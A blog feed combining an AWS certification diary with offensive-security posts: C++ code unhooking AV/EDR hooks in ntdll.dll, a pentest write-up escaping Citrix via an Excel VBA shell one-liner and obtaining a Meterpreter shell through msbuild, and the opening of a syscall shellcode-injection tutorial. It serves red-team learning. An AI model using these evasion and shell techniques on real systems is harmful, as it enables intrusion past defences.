From initial thought, it’s 5 days later. Exam scheduled for 1800 hrs I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question I had definitely gotten enough points to pass. I click next on the last question to end exam. AWS in a horrible play forces you to answer a survey before providing you the result.

I PASSED! You have to wait for a day or two to get the official notice that has a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy it would take a whole heap of studying to clear it. I followed a similar approach going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works because although Practitioner was easy it still gave me a chip on my shoulder going into this. Pick a post on Solutions Architect Associate and you’ll hear the pain, how tough it was, how it was most challenging cert of folks lives. I know from CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe impose some of the fear they had onto others who are coming behind them?  One thing about me, I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications are built upon the foundation. No matter which one  you go for it’s pretty much going deeper into the usage, capabilities of appropriate related services. I chose to sit for C01 although C02 was recently released I wasn’t going to risk being a live beta tester. I was concerned with the newer exams’ stability. As I write this C01 is officially dead in 3 days, July 1 2020 then all candidates will only have C02 good luck 🤣.

Date: Monday 05/014/2020 – 0800 hrs

5 days later after Practitioner (10 days total elapsed time from initial thought)

Okay I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did the universe had to step in. In a cocky rage I take the exam after studying for only 5 days. Clicking through the survey I was heartbroken I had FAILED and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points FML that made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retook it the next day I would have passed (again idk why, maybe that’s my way of dealing with failure, going even further balls to the wall 🤣) The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing or anyone could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled and fueled me more.

I figured I needed to learn from an alternative source – I went to AcloudGuru’s course which I felt was really lite compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek the instructor is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days later after 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know  after this go around and how I maybe didn’t deserve the 700 the first time. I definitely was gunning for a perfect exam 😂. And I forgot to mention when you pass any AWS cert you get 50% off the next, so me failing the first one totally screwed up the financial efficiency I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer for. Here’s what I woke up to the next day

God knew not to give me a perfect score! Probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH 👊🏾 This is how I was feeling at the moment!

via GIPHY


Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty but he didn’t 😞 I went through Linux Academy course. After that, I brought John Bonso course at tutorialsdojo.

Listen. LISTEN. 🗣🔊 LISTEN  The length of these questions are in-freaking-sane. I remember one night losing track of time, completing only like 20 questions but over 2 hours had elapsed. It quickly negged me out. I love reading but my gosh these were monsters and the scenarios were ridiculous. I was like bump this I’m not sure I really even want this thing that bad.

via GIPHY

I took like 2 weeks off and came back to it! I wondered if I forgot all the things I had learned from the course, I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. Eliminated all distractions once again – nobody can get a hold of me and every ounce of free time is devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case i failed 🤣🤞🏾 so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day at about 1400 hrs I don’t know why but I went back to the exam scheduling and saw they had a exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that”?

If it was one thing I knew it was this. I was going to be even more disappointed than I was when I came up short for Solutions Architect for the first time. I imagine it would have been something like this after failing.

via GIPHY

Exam was TOUGH. No other way to put it and guess what? Every single question was a monster just like the Bonso questions. 2 paragraphs minimal sometimes like four, tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely and one thing I think could have pushed me over the bridge for Solutions Architect that’s UNDERRATED is the “Whiteboard” feature on Pearson exams. I used that thing for mostly every question for Security Specialty. Unless you’re a Jedi it’s really tough to have a good understanding of what the monster is asking you without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time wise I breezed through Practitioner in ~35 minutes, Solutions Architect ~55 minutes, and this thing #bruh I remember looking up thinking sheesh you’re two hours deep. I had finally finished all 65 questions. Enter second guessing yourself:

I’m not clicking next or ending exam this time! There was maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like play Russian roulette. I changed about 9 answers total each one filled with a thought, “You’re probably on the borderline right now, you’re going to change an answer that’s correct, make it wrong and that’s going to be your demise”. It’s worth mentioning that only say 50% of the questions are single choice. The others are select the best 2, 3 out of 6,7 selections. The questions are random from a bank like most of the exams so I’m not sure if same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

Majority of the exam was exactly that reading, understanding policies – IAM, KMS, Bucket policies you better be able to read and understand them as if they were plain English. There was a ton of KMS related things, make SURE you know the nitty gritty like imported key material, all the different type of KMS encryption types when, where, rotation ect.

Clicked next, through the survey and I had PASSED!


I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19 this will be the first year since I’ve not been poor 😂 (after graduating ~5 years) that I won’t be on an island celebrating. Such is life. I brought myself AWAE as a birthday gift I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).

The post AWS Certification Trifecta appeared first on Certification Chronicles.

PE Parsing and Defeating AV/EDR API Hooks in C++

11 June 2020 at 15:20

PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this, I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post covers several topics, like system calls, user-mode vs. kernel-mode, and Windows architecture that I have covered somewhat here. I’m going to assume a certain amount of familiarity with those topics in this post.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of code execution to the AV/EDR in order to inspect the call and determine if it is malicious or not. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is actually a wrapper function for a systemcall to kernel-mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking function calls within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting an unconditional jump at the beginning of the function into the EDR’s code. The EDR processes the function call, and if it is allowed, execution flow will jump back to the original functional call so that the function performs as it normally would, with the calling process none the wiser.

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping NtDLL.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 1, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

handle hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
GetModuleInformation(hCurrentProcess, hNtdllModule, &miModuleInfo, sizeof(miModuleInfo));
LPVOID pHookedNtdllBaseAddress = (LPVOID)miModuleInfo.lpBaseOfDll;

The Dreaded PE Header

Ok, so we have the base address of the loaded ntdll.dll module within our process. But what does that mean exactly? Well, a DLL is a type of Portable Executable, along with EXEs. This means it is an executable file, and as such it contains a variety of headers and sections of different types that let the operating system know how to load and execute it. The PE header is notoriously dense and complex, as the link above shows, but I’ve found that seeing a working example in action that utilizes only parts of it makes it much easier to comprehend. Oh and pictures don’t hurt either. There are many out there with varying levels of detail, but here is a good one from Wikipedia that has enough detail without being too overwhelming:

PE Header

You can see the legacy of Windows is present at the very beginning of the PE, in the DOS header. It’s always there, but in modern times it doesn’t serve much purpose. We will get its address, however, to serve as an offset to get the actual PE header:

PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)pHookedNtdllBaseAddress;
PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)pHookedNtdllBaseAddress + hookedDosHeader->e_lfanew);

Here the e_lfanew field of the hookedDosHeader struct contains an offset into the memory of the module identifying where the PE header actually begins, which is the COFF header in the diagram above.

Now that we are at the beginning of the PE header, we can begin parsing it to find what we’re looking for. But let’s step back for a second and identify exactly what we are looking for so we know when we’ve found it.

Every executable/PE has a number of sections. These sections represent various types of data and code within the program, such as actual executable code, resources, images, icons, etc. These types of data are split into different labeled sections within the executable, named things like .text, .data, .rdata and .rsrc. The .text section, sometimes called the .code section, is what were are after, as it contains the assembly language instructions that make up ntdll.dll.

So how do we access these sections? In the diagram above, we see there is a section table, which contains an array of pointers to the beginning of each section. Perfect for iterating through and finding each section. This is how we will find our .text section, by using a for loop and going through each value of the hookedNtHeader->FileHeader.NumberOfSections field:

for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++)
{
    // loop through each section offset
}

From here on out, don’t forget we will be inside this loop, looking for the .text section. To identify it, we use our loop counter i as an index into the section table itself, and get a pointer to the section header:

PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

The section header for each section contains the name of that section. So we can look at each one and see if it matches .text:

if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text"))
    // process the header

We found the .text section! The header for it anyway. What we need now is to know the size and location of the actual code within the section. The section header has us covered for both:

LPVOID hookedVirtualAddressStart = (LPVOID)((DWORD_PTR)pHookedNtdllBaseAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);
SIZE_T hookedVirtualAddressSize = hookedSectionHeader->Misc.VirtualSize;

We now have everything we need to overwrite the .text section of the loaded and hooked ntdll.dll module with our clean ntdll.dll on disk:

  • The source to copy from (our memory-mapped file ntdll.dll on disk)
  • The destination to copy to (the hookedSectionHeader->VirtualAddress address of the .text section)
  • The number of bytes to copy (hookedSectionHeader->Misc.VirtualSize bytes )

Saving the Output

At this point, we save the entire contents of the .text section so we can examine it and compare it to the clean version and know that unhooking was successful:

char* hookedBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(hookedBytes, hookedVirtualAddressSize, hookedVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(hookedBytes, "hooked.txt", hookedVirtualAddressSize)

This simply makes a copy of the hooked .text section and calls the saveBytes function, which writes the bytes to a text file named hooked.txt. We’ll examine this file a little later on.

Memory Management

In order to overwrite the contents of the .text section, we need to save the current memory protection and change it to Read/Write/Execute. We’ll change it back once we’re done:

bool isProtected;
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, PAGE_EXECUTE_READWRITE, &oldProtection);
// overwrite the .text section here
isProtected = VirtualProtect(hookedVirtualAddressStart, hookedVirtualAddressSize, oldProtection, &oldProtection);

Home Stretch

We’re finally at the final phase. We start by getting the address of the beginning of the memory-mapped ntdll.dll to use as our copy source:

LPVOID cleanVirtualAddressStart = (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress);

Let’s save these bytes as well, so we can compare them later:

char* cleanBytes{ new char[hookedVirtualAddressSize] {} };
memcpy_s(cleanBytes, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);
saveBytes(cleanBytes, "clean.txt", hookedVirtualAddressSize);

Now we can overwrite the .text section with the unhooked copy of ntdll.dll:

memcpy_s(hookedVirtualAddressStart, hookedVirtualAddressSize, cleanVirtualAddressStart, hookedVirtualAddressSize);

That’s it! All this work for one measly line…

Checking Our Work

So how do we know we actually removed hooks and didn’t just move a bunch of bytes around? Let’s check our output files, hooked.txt and clean.txt. Here we compare them using VBinDiff. This first example is from running the program on a test machine with no AV/EDR product installed, and as expected, the loaded ntdll and the one on disk are identical:

No AV

So let’s run it again, this time on a machine with Avast Free Antivirus running, which uses hooks:

Running

With AV 1

Here we see hooked.txt on top and clean.txt on the bottom, and there are clear differences highlighted in red. We can take these raw bytes, which actually represent assembly instructions, and convert them to their assembly representation with an online disassembler.

Here is the disassembly of the clean ntdll.dll:

mov    QWORD PTR [rsp+0x20],r9
mov    QWORD PTR [rsp+0x10],rdx 

And here is the hooked version:

jmp    0xffffffffc005b978
int3
int3
int3
int3
int3 

A clear jump! This means that something has definitely changed in ntdll.dll when it is loaded into our process.

But how do we know it’s actually hooking a function call? Let’s see if we can find out a little more. Here is another example diff between the hooked DLL on top and the clean one on the bottom:

With AV 1

First the clean DLL:

mov    r10,rcx
mov    eax,0x37 
mov    r10,rcx
mov    eax,0x3a

And the hooked DLL:

jmp    0xffffffffbffe5318
int3
int3
int3
jmp    0xffffffffbffe4cb8
int3
int3
int3 

Ok, so we see some more jumps. But what do those mov eax and a number instructions mean? Those are syscall numbers! If you read my previous post, I went over how and why to find exactly these in assembly. The idea is to use the syscall number to directly invoke the underlying function in order to avoid… hooks! But what if you want to run code you haven’t written? How do you prevent those hooks from catching that code you can’t change? If you’ve made it this far, you already know!

So let’s use Mateusz “j00ru” Jurczyk’s handy Windows system call table and match up the syscall numbers with their corresponding function calls.

What do we find? 0x37 is NtOpenSection, and 0x3a is NtWriteVirtualMemory! Avast was clearly hooking these function calls. And we know that we have overwritten them with our clean DLL. Success!

Conclusion

Thanks again to spotless and his code that made this post possible. I hope it has been helpful and that the comments and documentation I’ve added help others learn more easily about hooking and the PE header.

Escaping Citrix Workspace and Getting Shells

10 June 2020 at 13:20

Escaping Citrix Workspace and Getting Shells

Background

On a recent web application penetration test I performed, the scoped application was a thick-client .NET application that was accessed via Citrix Workspace. I was able to escape the Citrix environment in two different ways and get a shell on the underlying system. From there I was able to evade two common AV/EDR products and get a Meterpreter shell by leveraging GreatSCT and the “living off the land” binary msbuild.exe. I have of course obfuscated any identifying names/URLs/IPs etc.

What is Citrix Workspace?

Citrix makes a lot of different software products, and in this case I was dealing with Workspace. So what is Citrix Workspace exactly? Here’s what the company says it is:

To realize the agility of cloud without complexity and security slowing you down, you need the flexibility and control of digital workspaces. Citrix Workspace integrates diverse technologies, platforms, devices, and clouds, so it’s flexible and easy to deploy. Adopt new technology without disrupting your existing infrastructure. IT and users can co-create a context-aware, software-defined perimeter that protects and proactively addresses security threats across today’s distributed, multi-device, hybrid- and multi-cloud environments. Unified, contextual, and secure, Citrix is building the workspace of the future so you can operationalize the technology you need to drive business forward.

With the marketing buzzwords out of the way, Workspace is essentially a network-accessible application virtualization platform. Think of it like Remote Desktop, but instead of accessing the entire desktop of a machine, it only presents specific desktop applications. Like the .NET app I was testing, or Office products like Excel. These applications are made available via a web dashboard, which is why it was in scope for the application test I was performing.

Prior Work on Exploiting Citrix

Citrix escapes are nothing new, and there is an excellent and comprehensive blog post on the subject by Pentest Partners. This was my starting point when I discovered I was facing Citrix. It’s absolutely worth a read if you find yourself working with Citrix, and the two exploit ideas I leveraged came from there.

Escape 1: Excel/VBA

Upon authenticating to the application, this is the dashboard I saw.

Citrix dashboard

The blue “E” is the thick-client app, and you can see that Excel is installed as well. The first step is to click on the Excel icon and open a .ICA (Independent Computing Architecture) file. This is similar to and RDP file, and is opened locally with Citrix Connection Manager. Once the .ica file loads, we are presented with a remote instance of Excel presented over the network onto our desktop. Time to see if VBA is accessible.

Excel VBA

Pressing Alt + F11 in Excel will open the VBA editor, which we see open here. I click on the default empty sheet named Sheet1, and I’m presented with a VBA editor console:

Excel VBA editor

Now let’s get a shell! A quick Duck Duck Go search and we have a VB one-liner to run Powershell:

1
2
3
Sub X()
    Shell "CMD /K/ %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe", vbNormalFocus
End Sub

VBA payload

Press F5 to execute the code:

first shell

Shell yeah! We have a Powershell instance on the remote machine. Note that I initially tried cmd.exe, which was blocked the by the Citrix configuration.

Escape 2: Local file creation/Powershell ISE

The second escape I discovered was a little more involved, and made use of Save As dialogs to navigate the underlying file system and create Powershell script file. I started by opening the .NET thick-client application, shown here on the web dashboard with a blue “E”:

E dashboard

We click on it, open the .ICA file as before, and are presented with the application, running on a remote machine and presented to us locally over the network.

E opened

I start by clicking on the Manuals tab and opening a manual PDF with Adobe Reader:

E manual

Adobe manual

As discussed in the Pentest Partners post, I look at the Save As dialog and see if I can enumerate the file system:

save as

I can tell from the path in the dialog box that we are looking at a non-local file system, which is good news. Let’s open a different folder in a new window so we can browse around a bit and maybe create files of our own:

save as

Here I open Custom Office Templates in a new Explorer window, and create a new text document. I enter a Powershell command, Get-Process, and save it as a .ps1 file:

new file

Once the Powershell file is created, I leverage the fact that Powershell files are usually edited with Powershell ISE, or Integrated Scripting Environment. This just so happens to have a built-in Powershell instance for testing code as you write it. Let’s edit it and see what it opens with:

edit ps1 ISE

Shell yeah! We have another shell.

Getting C2, and a copy pasta problem

Once I gained a shell on the underlying box, I started doing some enumeration and discovered that outbound HTTP traffic was being filtered, presumably by an enterprise web proxy. So downloading tools or implants directly was out of the question, and not good OPSEC either. However, many C2 frameworks use HTTP for communication, so I needed to try something that worked over TCP, like Meterpreter. But how to get a payload on the box? HTTP was out, and dragging and dropping files does not work, just as it wouldn’t over RDP normally. But Citrix provides us a handy feature: a shared clipboard.

Here’s the gist: create a payload in a text format or a Base64 encoded binary and use the Powershell cmdlet Set-Clipboard to copy it into our local clipboard. Then on the remote box, save the contents of the clipboard to a file with Get-Clipboard > file. I wanted to avoid dropping a binary Meterpreter payload, so I opted for GreatSCT. This is a slick tool that lets you embed a Meterpreter payload within an XML file that can be parsed and run via msbuild.exe. MSbuild is a so-called “living off the land” binary, a Microsoft-signed executable that already exists on the box. It’s used by Visual Studio to perform build actions, as defined by an XML file or C# project file. Let’s see how it went.

I started by downloading GreatSCT on Kali Linux and creating an msbuild/meterpreter/rev_tcp payload:

GreatSCT

Here’s what the resulting XML payload looks like:

payload.xml

As I mentioned above, I copy the contents of the payload.xml file into the shared clipboard:

payload.xml

Then on the victim machine I copy it from the clipboard to the local file system:

payload.xml

I then start a MSF handler and execute the payload with msbuild.exe:

payload.xml

payload.xml

Shell yeah! We have a Meterpreter session, and the AV/EDR products haven’t given us any trouble.

Conclusions

There were a couple things I took away from this engagement, mostly revolving around the difficulty of providing partial access to Windows.

  • Locking down Windows is hard, so locking down Citrix is hard.

Citrix has security features designed to prevent access to the underlying operating system, but they inherently involve providing access to Windows applications while trying to prevent all the little ways of getting shells, accessing the file system, and exploiting application functionality. Reducing the attack surface of Windows is difficult, and by permitting partial access to the OS via Citrix, you inherit all of that attack surface.

  • Don’t allow access to dangerous features.

This application could have prevented the escapes I used by not allowing Excel’s VBA feature and blocking access to powershell.exe, as was done with cmd.exe. However I was informed that both features were vital to the operation of the .NET application. Without some very careful re-engineering of the application itself, application whitelisting, and various other hardening techniques, none of which are guaranteed to be 100% effective, it is very hard or impossible to present VB and Powershell functionality without allowing inadvertent shell access.

Using Syscalls to Inject Shellcode on Windows

1 June 2020 at 15:20

Using Syscalls to Inject Shellcode on Windows

After learning how to write shellcode injectors in C via the Sektor7 Malware Development Essentials course, I wanted to learn how to do the same thing in C#. Writing a simple injector that is similar to the Sektor7 one, using P/Invoke to run similar Win32 API calls, turns out to be pretty easy. The biggest difference I noticed was that there was not a directly equivalent way to obfuscate API calls. After some research and some questions on the BloodHound Slack channel (thanks @TheWover and @NotoriousRebel!), I found there are two main options I could look into. One is using native Windows system calls (AKA syscalls), or using Dynamic Invocation. Each have their pros and cons, and in this case the biggest pro for syscalls was the excellent work explaining and demonstrating them by Jack Halon (here and here) and badBounty. Most of this post and POC is drawn from their fantastic work on the subject. I know TheWover and Ruben Boonen are doing some work on D/Invoke, and I plan on digging into that next.

I want to mention that a main goal of this post is to serve as documentation for this proof of concept and to clarify my own understanding. So while I’ve done my best to ensure the information here is accurate, it’s not guaranteed to be 100%. But hey, at least the code works.

Said working code is available here

Native APIs and Win32 APIs

To begin, I want to cover why we would want to use syscalls in the first place. The answer is API hooking, performed by AV/EDR products. This is a technique defensive products use to inspect Win32 API calls before they are executed, determine if they are suspicious/malicious, and either block or allow the call to proceed. This is done by slightly the changing the assembly of commonly abused API calls to jump to AV/EDR controlled code, where it is then inspected, and assuming the call is allowed, jumping back to the code of the original API call. For example, the CreateThread and CreateRemoteThread Win32 APIs are often used when injecting shellcode into a local or remote process. In fact I will use CreateThread shortly in a demo of injection using strictly Win32 APIs. These APIs are defined in Windows DLL files, in this case MSDN tells us in Kernel32.dll. These are user-mode DLLs, which mean they are accessible to running user applications, and they do not actually interact directly with the operating system or CPU. Win32 APIs are essentially a layer of abstraction over the Windows native API. This API is considered kernel-mode, in that these APIs are closer to the operating system and underlying hardware. There are technically lower levels than this that actually perform kernel-mode functionality, but these are not exposed directly. The native API is the lowest level that is still exposed and accessible by user applications, and it functions as a kind of bridge or glue layer between user code and the operating system. Here’s a good diagram of how it looks:

Windows Architecture

You can see how Kernell32.dll, despite the misleading name, sits at a higher level than ntdll.dll, which is right at the boundary between user-mode and kernel-mode.

So why does the Win32 API exist? A big reason it exists is to call native APIs. When you call a Win32 API, it in turn calls a native API function, which then crosses the boundary into kernel-mode. User-mode code never directly touches hardware or the operating system. So the way it is able to access lower-level functionality is through native PIs. But if the native APIs still have to call yet lower level APIs, why not got straight to native APIs and cut out an extra step? One answer is so that Microsoft can make changes to the native APIs with out affecting user-mode application code. In fact, the specific functions in the native API often do change between Windows versions, yet the changes don’t affect user-mode code because the Win32 APIs remain the same.

So why do all these layers and levels and APIs matter to us if we just want to inject some shellcode? The main difference for our purposes between Win32 APIs and native APIs is that AV/EDR products can hook Win32 calls, but not native ones. This is because native calls are considered kernel-mode, and user code can’t make changes to it. There are some exceptions to this, like drivers, but they aren’t applicable for this post. The big takeaway is defenders can’t hook native API calls, while we are still allowed to call them ourselves. This way we can achieve the same functionality without the same visibility by defensive products. This is the fundamental value of system calls.

System Calls

Another name for native API calls is system calls. Similar to Linux, each system call has a specific number that represents it. This number represents an entry in the System Service Dispatch Table (SSDT), which is a table in the kernel that holds various references to various kernel-level functions. Each named native API has a matching syscall number, which has a corresponding SSDT entry. In order to make use of a syscall, it’s not enough to know the name of the API, such as NtCreateThread. We have to know its syscall number as well. We also need to know which version of Windows our code will run on, as the syscall numbers can and likely will change between versions. There are two ways to find these numbers, one easy, and one involving the dreaded debugger.

The first and easist way is to use the handy Windows system call table created by Mateusz “j00ru” Jurczyk. This makes it dead simple to find the syscall number you’re looking for, assuming you already know which API you’re looking for (more on that later).

WinDbg

The second method of finding syscall numbers is to look them up directly at the source: ntdll.dll. The first syscall we need for our injector is NtAllocateVirtualMemory. So we can fire up WinDbg and look for the NtAllocateVirtualMemory function in ntdll.dll. This is much easier than it sounds. First I open a target process to debug. It doesn’t matter which process, as basically all processes will map ntdll.dll. In this case I used good old notepad.

Opening Notepad in WinDbg

We attach to the notepad process and in the command prompt enter x ntdll!NtAllocateVirtualMemory. This lets us examine the NtAllocateVirtualMemory function within the ntdll.dll DLL. It returns a memory location for the function, which we examine, or unassemble, with the u command:

NtAllocateVirtualMemory Unassembled

Now we can see the exact assembly language instructions for calling NtAllocateVirtualMemory. Calling syscalls in assembly tends to follow a pattern, in that some arguments are setup on the stack, seen with the mov r10,rcx statement, followed by moving the syscall number into the eax register, shown here as mov eax,18h. eax is the register the syscall instruction uses for every syscall. So now we know the syscall number of NtAllocateVirtualMemory is 18 in hex, which happens to be the same value listed on in Mateusz’s table! So far so good. We repeat this two more times, once for NtCreateThreadEx and once for NtWaitForSingleObject.

Finding the syscall number for NtCreateThreadEx Finding the syscall number for NtWaitForSingleObject

Where are you getting these native functions?

So far the process of finding the syscall numbers for our native API calls has been pretty easy. But there’s a key piece of information I’ve left out thus far: how do I know which syscalls I need? The way I did this was to take a basic functioning shellcode injector in C# that uses Win32 API calls (named Win32Injector, included in the Github repository for this post) and found the corresponding syscalls for each Win32 API call. Here is the code for Win32Injector:

Win32Injector

This is a barebones shellcode injector that executes some shellcode to display a popup box:

Hello world from Win32Injector

As you can see from the code, the three main Win32 API calls used via P/Invoke are VirtualAlloc, CreateThread, and WaitForSingleObject, which allocate memory for our shellcode, create a thread that points to our shellcode, and start the thread, respectively. As these are normal Win32 APIs, they each have comprehensive documentation on MSDN. But as native APIs are considered undocumented, we may have to look elsewhere. There is no one source of truth for API documentation that I could find, but with some searching I was able to find everything I needed.

In the case of VirtualAlloc, some simple searching showed that the underlying native API was NtAllocateVirtualMemory, which was in fact documented on MSDN. One down, two to go.

Unfortunately, there was no MSDN documentation for NtCreateThreadEx, which is the native API for CreateThread. Luckily, badBounty’s directInjectorPOC has the function definition available, and already in C# as well. This project was a huge help, so kudos to badBounty!

Lastly, I needed to find documentation for NtWaitForSingleObject, which as you might guess, is the native API called by WaitForSingleObject. You’ll notice a theme where many native API calls are prefaced with “Nt”, which makes mapping them from Win32 calls easier. You may also see the prefix “Zw”, which is also a native API call, but normally called from the kernel. These are sometimes identical, which you will see if you do x ntdll!ZwWaitForSingleObject and x ntdll!NtWaitForSingleObject in WinDbg. Again we get lucky with this API, as ZwWaitForSingleObject is documented on MSDN.

I want to point out a few other good sources of information for mapping Win32 to native API calls. First is the source code for ReactOS, which is an open source reimplementation of Windows. The Github mirror of their codebase has lots of syscalls you can search for. Next is SysWhispers, by jthuraisamy. It’s a project designed to help you find and implement syscalls. Really good stuff here. Lastly, the tool API Monitor. You can run a process and watch what APIs are called, their arguments, and a whole lot more. I didn’t use this a ton, as I only needed 3 syscalls and it was faster to find existing documentation, but I can see how useful this tool would be in larger projects. I believe ProcMon from Sysinternals has similar functionality, but I didn’t test it out much.

Ok, so we have our Win32 APIs mapped to our syscalls. Let’s write some C#!

But these docs are all for C/C++! And isn’t that assembly over there…

